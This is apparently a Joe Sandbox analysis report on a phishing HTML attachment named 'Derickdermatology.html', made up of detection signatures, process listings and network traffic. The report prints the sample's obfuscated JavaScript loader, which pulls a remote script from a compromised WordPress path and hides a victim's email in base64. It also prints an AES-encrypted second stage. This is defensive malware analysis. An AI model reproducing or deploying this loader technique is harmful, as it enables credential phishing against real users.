Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Derickdermatology.html

Overview

General Information

Sample name:Derickdermatology.html
Analysis ID:1545553
MD5:269a9b54fbf78522d4ed8c5bcdf48807
SHA1:ee6dfe25a01f305fdcc392befb6c2232ffef5c92
SHA256:3c09e5856f661b6615efa6dd46f9cb5bff5f77ab64edc29edb2c4d45eabb8b52
Infos:

Detection

Phisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Phisher
Detected javascript redirector / loader
HTML page contains hidden email address
Suspicious Javascript code found in HTML file
Form action URLs do not match main URL
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML page contains string obfuscation
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Derickdermatology.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1964,i,11314457020440692918,918802598035399171,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 7872 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Derickdermatology.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1892,i,752861697827379664,18182631419507974909,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Derickdermatology.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7792 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1668 --field-trial-handle=1908,i,11277362346978830848,2288916482173699975,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_391JoeSecurity_Phisher_2Yara detected PhisherJoe Security
    dropped/chromecache_303JoeSecurity_Phisher_2Yara detected PhisherJoe Security
      dropped/chromecache_289JoeSecurity_Phisher_2Yara detected PhisherJoe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: Yara matchFile source: dropped/chromecache_391, type: DROPPED
        Source: Yara matchFile source: dropped/chromecache_303, type: DROPPED
        Source: Yara matchFile source: dropped/chromecache_289, type: DROPPED
        Source: Derickdermatology.htmlHTTP Parser: Low number of body elements: 0
        Source: file:///C:/Users/user/Desktop/Derickdermatology.htmlHTTP Parser: aderick@derickdermatology.com
        Source: https://clinicaaryal.com/wp-admin/maint/404.phpHTTP Parser: aderick@derickdermatology.com
        Source: https://clinicaaryal.com/wp-admin/maint/404.phpHTTP Parser: aderick@derickdermatology.com
        Source: https://clinicaaryal.com/wp-admin/maint/404.phpHTTP Parser: aderick@derickdermatology.com
        Source: Derickdermatology.htmlHTTP Parser: document.write
        Source: https://www.bing.com/search?q=testacHTTP Parser: Form action: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=6c2ba448-0480-44b3-a361-a6b55d38f78c&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%22622FAB4BC2224394A73A643D59292029%22%7d&sso_reload=true bing microsoftonline
        Source: https://www.bing.com/search?q=testacHTTP Parser: Number of links: 0
        Source: Derickdermatology.htmlHTTP Parser: Base64 decoded: aderick@derickdermatology.com
        Source: file:///C:/Users/user/Desktop/Derickdermatology.htmlHTTP Parser: Found new string: script ..var initial = "YWRlcmlja0BkZXJpY2tkZXJtYXRvbG9neS5jb20=";..document.write('<script src="' + 'h'+'tt'+'p'+'s'+':'+'//'+'c'+'lin'+'ica'+'arya'+'l.'+'com'+<!-- <span>Healthy living is happy living.</span> -->.'/w'+'p-ad'+'mi'+'n'+'/'+'mai'+'n'+'t/4'+'04.p'+'hp?0'+<!-- <span>Healthy living is the best gift.</span> -->.'-79'+'7'+'9'+'6'+'77'+'04'+'b53'+'69'+'3230'+'746'+'4'+'507'+<!-- Health is the key to success. -->.'a636'+'b73'+'535'+'5307'+'2'+'4c6'+'3'+'374'+'d7'+'a'+<!-- Your body deserves the best. -->.'39'+'4d72'+'547'+'45'+'24'+'c7'+'a73'+'2f5'+'6'+'543'+<!-- <span>Good health, good life.</span> -->.'86c'+'4f5'+'44'+'84c'+'5'+'8'+'7a3'+'8784'+'c53'+<!-- <p>Stay healthy, stay positive.</p> -->.'613'+'351'+'797'+'96a'+'4'+'a7'+'a'+'51'+'454'+'1-'+'init'+'ial' + '"><\/script>'); <!-- <span>Wellness is the key to happiness.</span> -->.<!-- Health is the groundwork of happiness. -->...
        Source: https://www.bing.com/search?q=testacHTTP Parser: Title: Redirecting does not match URL
        Source: https://clinicaaryal.com/wp-admin/maint/404.php?0-797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541-initialHTTP Parser: var establish= document.createelement("script");establish.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(establish);establish.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoisfnpqjfhwfwvrw5hvmy2u1a2rfpbmvzxn0hhaxfsywp1evwvnm9caly3ystlvk8zng9vskxhnjhsvtawcxjnbut2cktyrg1yk2vzb000t2u0aells3i2zkplcfdudg9jce1xvvfrbxq0mctuavurqvrpenl2c1vnzksxy21psulzvnhmwitruxrndfi1bhmwvjbxzjhote5zyuhbrhdcl2pixc9tvdvsa0rxdmxkm1j0egtbdgfunnhwdtrowvrnbefmcu1peu1nofwvvmptagfaeelcl29ozvjisxjrtemrdw1qqxzunwvotk9rwghwcwm0ngjzqzezsznmr3zaovzosnv1zfqwaelsm1wvejlrzkjoa1zywgzcl1wvc2w0vnvlwfmrqva1remybhnhk3pybfwvyutiek9puuvnr0tneux6rkozvlhttxjvtwx5vfwveeprtufqynq5qvu1zxpwzmnubvzkmuszstfvow0rcu9vmekrcepzrllqbjfyvlnxeehumkjzuuhpsxnttlvpzndls3lrqknga2c1qwr6k3vacgvdbfvpritutzfwq1wvv29pakw2wgzydmvvmgj6ctroz0zlvfe3vfpmmzjzsljer0j5qxjvm2hznzjazthrtdziuthyuityc2p2cfnuzvhovlk3cjz2m0dpxc9qd3vymkvoq0vcl1bgciisimmioijim2njownlnjc4nmu4ytllnjbmyzkwogq0nzi3yty2zcisimiioii...
        Source: Derickdermatology.htmlHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/Derickdermatology.htmlHTTP Parser: No favicon
        Source: https://clinicaaryal.com/wp-admin/maint/404.phpHTTP Parser: No favicon
        Source: https://clinicaaryal.com/wp-admin/maint/404.phpHTTP Parser: No favicon
        Source: https://clinicaaryal.com/wp-admin/maint/404.phpHTTP Parser: No favicon
        Source: https://www.bing.com/search?q=testacHTTP Parser: No favicon
        Source: https://www.bing.com/search?q=testacHTTP Parser: No favicon
        Source: https://www.bing.com/search?q=testacHTTP Parser: No <meta name="author".. found
        Source: https://www.bing.com/search?q=testacHTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49716 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49720 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49724 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49959 version: TLS 1.2
        Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
        Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
        Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
        Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: global trafficHTTP traffic detected: GET /wp-admin/maint/404.php?0-797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541-initial HTTP/1.1Host: clinicaaryal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-admin/maint/404.php?0-797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541-initial HTTP/1.1Host: clinicaaryal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: clinicaaryal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://clinicaaryal.com/wp-admin/maint/404.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
        Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=m+V8WmbNk+DLE5l&MD=1G1bEnf1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /wp-admin/maint/404.php?0-797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541-initial HTTP/1.1Host: clinicaaryal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-admin/maint/404.php?0-797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541-initial HTTP/1.1Host: clinicaaryal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: clinicaaryal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://clinicaaryal.com/wp-admin/maint/404.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=m+V8WmbNk+DLE5l&MD=1G1bEnf1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /wp-admin/maint/404.php?0-797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541-initial HTTP/1.1Host: clinicaaryal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-admin/maint/404.php?0-797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541-initial HTTP/1.1Host: clinicaaryal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: clinicaaryal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://clinicaaryal.com/wp-admin/maint/404.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /instrument/cookieenabled HTTP/1.1Host: 3pcookiecheck.azureedge.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.bing.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://login.microsoftonline.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: clinicaaryal.com
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: aefd.nelreports.net
        Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
        Source: unknownHTTP traffic detected: POST /wp-admin/maint/404.php HTTP/1.1Host: clinicaaryal.comConnection: keep-aliveContent-Length: 169Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Wed, 30 Oct 2024 16:12:51 GMTserver: LiteSpeedvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Wed, 30 Oct 2024 16:13:21 GMTserver: LiteSpeedvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Wed, 30 Oct 2024 16:13:39 GMTserver: LiteSpeedvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
        Source: chromecache_270.3.dr, chromecache_229.3.drString found in binary or memory: http://feross.org
        Source: chromecache_359.3.dr, chromecache_314.3.drString found in binary or memory: http://ww.w3.org/1999/02/22-rdf-syntax-ns#
        Source: chromecache_253.3.drString found in binary or memory: https://3pcookiecheck.azureedge.net
        Source: chromecache_253.3.drString found in binary or memory: https://accenturelearning.tekstac.com
        Source: chromecache_253.3.drString found in binary or memory: https://accenturelearning.tekstac.com/login/forgot_password.php
        Source: chromecache_253.3.drString found in binary or memory: https://accenturelearning.tekstac.com/login/index.php
        Source: chromecache_253.3.drString found in binary or memory: https://app.testrac.com
        Source: chromecache_253.3.drString found in binary or memory: https://app.testrac.com/
        Source: chromecache_420.3.dr, chromecache_324.3.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
        Source: chromecache_253.3.drString found in binary or memory: https://cognizant.tekstac.com/login/forgot_password.php
        Source: chromecache_314.3.drString found in binary or memory: https://ezgif.com/effects
        Source: chromecache_248.3.dr, chromecache_259.3.drString found in binary or memory: https://github.com/zloirock/core-js
        Source: chromecache_248.3.dr, chromecache_259.3.drString found in binary or memory: https://github.com/zloirock/core-js/blob/v3.37.1/LICENSE
        Source: chromecache_336.3.dr, chromecache_383.3.drString found in binary or memory: https://login.chinacloudapi.cn
        Source: chromecache_336.3.dr, chromecache_383.3.drString found in binary or memory: https://login.microsoftonline.com
        Source: chromecache_336.3.dr, chromecache_383.3.drString found in binary or memory: https://login.microsoftonline.de
        Source: chromecache_336.3.dr, chromecache_383.3.drString found in binary or memory: https://login.microsoftonline.us
        Source: chromecache_336.3.dr, chromecache_383.3.drString found in binary or memory: https://login.windows-ppe.net
        Source: chromecache_301.3.dr, chromecache_355.3.drString found in binary or memory: https://notification.api.microsoftapp.net/user/injection/v1/
        Source: chromecache_253.3.drString found in binary or memory: https://www.ciol.com
        Source: chromecache_253.3.drString found in binary or memory: https://www.ciol.com/maveric-systems-unveils-testac/
        Source: chromecache_253.3.drString found in binary or memory: https://www.niche.com
        Source: chromecache_253.3.drString found in binary or memory: https://www.niche.com/colleges/texas-state-technical-college/
        Source: chromecache_253.3.drString found in binary or memory: https://www.tekstac.com
        Source: chromecache_253.3.drString found in binary or memory: https://www.tekstac.com/
        Source: chromecache_253.3.drString found in binary or memory: https://www.testac4ate.com
        Source: chromecache_253.3.drString found in binary or memory: https://www.testac4ate.com/
        Source: chromecache_253.3.drString found in binary or memory: https://www.testac4ate.com/challenge-page/0ddc7004-be9f-4ebd-a396-fb532a35de1b
        Source: chromecache_253.3.drString found in binary or memory: https://www.testac4ate.com/challenges
        Source: chromecache_253.3.drString found in binary or memory: https://www.texasassessment.gov
        Source: chromecache_253.3.drString found in binary or memory: https://www.texasassessment.gov/families.html
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
        Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
